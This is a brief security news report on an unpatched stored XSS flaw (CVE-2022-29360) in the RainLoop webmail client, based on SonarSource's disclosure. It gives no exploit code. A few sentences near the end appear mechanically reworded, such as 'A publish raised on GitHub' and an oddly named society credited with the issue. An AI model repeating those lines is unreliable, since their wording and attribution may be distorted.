An unpatched high-severity security flaw has been revealed in the open-source webmail client RainLoop that may be weaponized to siphon emails from victims’ inboxes.
“The vulnerability of the code […] can be easily exploited by an attacker sending a malicious email to a victim using RainLoop as an email client,” Simon Scannell, security researcher at SonarSource mentioned in a report published this week.
“When the email is viewed by the victim, the attacker takes full control of the victim’s session and can steal any of their emails, including those containing highly sensitive information such as passwords, documents, and password reset links.”
Tracked as CVE-2022-29360, the flaw relates to a stored cross-site-scripting (XSS) vulnerability impacting the latest version of RainLoop (v1.16.0) which was released on May 7, 2021.
Stored XSS flaws, also known as persistent XSS, occur when a malicious script is injected directly into the server of a target web application by means of user input (e.g. a comment field) that is stored permanently in a database and is then served to other users.
SonarSource, in its disclosure timeline, said it notified RainLoop maintainers of the bug on Nov. 30, 2021, and that the software maker hadn’t released a fix for more than four months.
A publish raised on GitHub by the Swiss Code Quality and Security Society on December 6, 2021, remains open to date. We’ve reached out to RainLoop for comment, and we’ll update the story if we get back to you.
In the absence of patches, SonarSource recommends users migrate to a RainLoop fork called SnappyMailwhich is actively maintained and unaffected by the security issue.